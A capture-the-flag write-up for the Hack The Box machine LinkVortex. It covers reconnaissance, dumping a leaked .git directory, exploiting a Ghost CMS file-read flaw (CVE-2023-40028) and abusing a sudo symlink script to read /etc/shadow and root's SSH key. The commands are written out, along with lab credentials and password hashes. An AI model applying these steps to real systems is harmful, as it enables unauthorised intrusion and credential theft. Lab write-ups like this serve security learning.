HTB-LinkVortex

Box Info

Difficulty Easy
OS Linux
IP Address 10.10.11.47

Port Scanning

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
# Check all open TCP
sudo rustscan 10.10.11.47 -r 1-65535 --ulimit 5000
# Nmap scan with script on open TCP port
sudo nmap 10.10.11.47 -sCV -Pn -sT -p 22,80
# Nmap scan vulnerability 
sudo nmap -sT -p 22,80 --script=vuln -O -Pn 10.10.11.47
# Nmap scan with UDP port
sudo nmap -sU --top-ports 20 -Pn 10.10.11.47

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:f8:b9:68:c8:eb:57:0f:cb:0b:47:b9:86:50:83:eb (ECDSA)
|_  256 a2:ea:6e:e1:b6:d7:e7:c5:86:69:ce:ba:05:9e:38:13 (ED25519)
80/tcp open  http    Apache httpd
|_http-title: Did not follow redirect to http://linkvortex.htb/
|_http-server-header: Apache
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Update DNS

1
2
sudo nano /etc/hosts
10.10.11.47 linkvortex.htb

Service Enumeration

Port 80

a3a5680a2b0e9b900f969a4f2df1416b.webp

Directory Buster

1
2
3
4
5
6
7
dirsearch -u linkvortex.htb -t 50 -i 200
...
[01:34:23] 200 -   15KB - /favicon.ico                                      
[01:34:30] 200 -    1KB - /LICENSE                                          
[01:34:42] 200 -  103B  - /robots.txt                                       
[01:34:44] 200 -  258B  - /sitemap.xml
...

Check robots.txt

1
2
3
4
5
6
7
curl -L http://linkvortex.htb/robots.txt
User-agent: *
Sitemap: http://linkvortex.htb/sitemap.xml
Disallow: /ghost/
Disallow: /p/
Disallow: /email/
Disallow: /r/

Access to ghost

http[:]//linkvortex[.]htb/ghost/#/signin is a login form, but weak credentials admin:admin doesn’t work.

962b50f05f084331a3ee347125bc2737.webp

Subdomain Buster

1
2
3
4
ffuf -u http://linkvortex.htb/ -H "Host:FUZZ.linkvortex.htb"  -mc 200 -w /usr/share/wordlists/seclists/Discovery/DNS/namelist.txt
...
dev                     [Status: 200, Size: 2538, Words: 670, Lines: 116, Duration: 39ms]
...

found dev subdomain, lets add it to /etc/hosts

http[:]//dev[.]linkvortex[.]htb/

c01a659f8ec527f3ee2f53f716c73409.webp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
dirsearch -u dev.linkvortex.htb -t 50 -i 200
...
[01:39:43] 200 -  557B  - /.git/                                            
[01:39:43] 200 -  201B  - /.git/config                                      
[01:39:43] 200 -   73B  - /.git/description
[01:39:43] 200 -   41B  - /.git/HEAD
[01:39:43] 200 -  620B  - /.git/hooks/                                      
[01:39:43] 200 -  240B  - /.git/info/exclude                                
[01:39:43] 200 -  401B  - /.git/logs/                                       
[01:39:43] 200 -  402B  - /.git/info/                                       
[01:39:43] 200 -  147B  - /.git/packed-refs                                 
[01:39:43] 200 -  418B  - /.git/objects/
[01:39:43] 200 -  393B  - /.git/refs/                                       
[01:39:43] 200 -  175B  - /.git/logs/HEAD                                   
[01:39:43] 200 -  691KB - /.git/index
...

Upon scan through the dev subdomain, found the git information is leaked.

GitHack

As we known that we found the .git leaked file on dev subdomain. Lets capture the git information using this dumper

https://github.com/lijiejie/GitHack

1
python3 GitHack.py http://linkvortex.htb/.git/

d090cf64303fb2eba854a8ecb8e29ee6.webp

Inside the git file, found a number of user credentials.

e8f4572950adfd4f21fe9be555507531.webp

From the author we know it is using the admin as username. Inside the js file found a number of password.

dcd0153b91024c55dcdc18ebbf1dc4b8.webp

Arbitrary File Read

Interesting information of Ghost CMS is using v5.58.0. Based on the OSINT findings, Ghost ≤ 5.59.0 having the Arbitrary file read vulnerability. Site administrators can check for exploitation of this issue by looking for unknown symlinks within Ghost’s content/ folder

9de8f6818723f634c97d77c9930f58cf.webp

https://github.com/TryGhost/Ghost/security/advisories/GHSA-9c9v-w225-v5rg

https://github.com/0xDTC/Ghost-5.58-Arbitrary-File-Read-CVE-2023-40028

Lets try it with the python script.

1
./CVE-2023-40028 -u admin@linkvortex.htb -p OctopiFociPilfer45 -h http://linkvortex.htb

f911cd0a88cee741c6680fd422b50702.webp

Back in the Git file, there is a Dockerfile.ghost mentioning about the config

db30c9fab34e9051fd5e7095307b531c.webp

We can abuse the arbitrary file read to check this file

1
/var/lib/ghost/config.production.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
Enter the file path to read (or type 'exit' to quit): /home/node/user.txt
File content:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Error</title>
</head>
<body>
<pre>Not Found</pre>
</body>
</html>
Enter the file path to read (or type 'exit' to quit): /home/node/.ssh/authorized_keys
File content:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Error</title>
</head>
<body>
<pre>Not Found</pre>
</body>
</html>
Enter the file path to read (or type 'exit' to quit): /var/lib/ghost/config.production.json
File content:
{
  "url": "http://localhost:2368",
  "server": {
    "port": 2368,
    "host": "::"
  },
  "mail": {
    "transport": "Direct"
  },
  "logging": {
    "transports": ["stdout"]
  },
  "process": "systemd",
  "paths": {
    "contentPath": "/var/lib/ghost/content"
  },
  "spam": {
    "user_login": {
        "minWait": 1,
        "maxWait": 604800000,
        "freeRetries": 5000
    }
  },
  "mail": {
     "transport": "SMTP",
     "options": {
      "service": "Google",
      "host": "linkvortex.htb",
      "port": 587,
      "auth": {
        "user": "bob@linkvortex.htb",
        "pass": "fibber-talented-worth"
        }
      }
    }
}

Here we obtain another user bob@linkvortex.htb:fibber-talented-worth

Initiate User Foothold

1
ssh bob@linkvortex.htb

9d11355c09c0270d4425a5f929f2e689.webp

Privilege Escalation

Sudo privilege escalation

0ebe0033063a661c3a3ab7d7491281e9.webp

User can abuse the clean_symlink.sh to any png file format

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
#!/bin/bash

QUAR_DIR="/var/quarantined"

if [ -z $CHECK_CONTENT ];then
  CHECK_CONTENT=false
fi

LINK=$1

if ! [[ "$LINK" =~ \.png$ ]]; then
  /usr/bin/echo "! First argument must be a png file !"
  exit 2
fi

if /usr/bin/sudo /usr/bin/test -L $LINK;then
  LINK_NAME=$(/usr/bin/basename $LINK)
  LINK_TARGET=$(/usr/bin/readlink $LINK)
  if /usr/bin/echo "$LINK_TARGET" | /usr/bin/grep -Eq '(etc|root)';then
    /usr/bin/echo "! Trying to read critical files, removing link [ $LINK ] !"
    /usr/bin/unlink $LINK
  else
    /usr/bin/echo "Link found [ $LINK ] , moving it to quarantine"
    /usr/bin/mv $LINK $QUAR_DIR/
    if $CHECK_CONTENT;then
      /usr/bin/echo "Content:"
      /usr/bin/cat $QUAR_DIR/$LINK_NAME 2>/dev/null
    fi
  fi
fi

The script /opt/ghost/clean_symlink.sh contains a potential vulnerability through the environment variable CHECK_CONTENT, which controls whether cat is executed on a quarantined file. 

1
2
ln -s /etc/shadow cute.png
sudo CHECK_CONTENT=true /usr/bin/bash /opt/ghost/clean_symlink.sh cute.png

Initiate Root Foothold

1
2
3
4
ln -s /root/.ssh/id_rsa cute.txt
ln -s /home/bob/cute.txt cute.png
export CHECK_CONTENT=true
sudo /usr/bin/bash /opt/ghost/clean_symlink.sh cute.png

id_rsa

1
2
3
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1r....
-----END OPENSSH PRIVATE KEY-----

SSH Access

1
2
chmod 600 id_rsa
ssh -i id_rsa root@linkvortex.htb

89de3ff0804547335937d8940973d5c2.webp

/etc/shadow

1
2
root:$y$j9T$C3zg87gHwrCXO0vl4igIh/$iisf9sVwilKAi7mI5p1FqQslJWM9t2.YUWznIPC/XIA:19814:0:99999:7:::
bob:$6$rounds=656000$4p3mw8hAd9ir.25f$ocGm9nW1TM2AB8Z.l0K.hi43bOrm3oxQsaKFACMoS2UL.tIXxSW3u/xsClrvkEhP5s.GUpdIvCX3qRtppDV8r.:19814:0:99999:7:::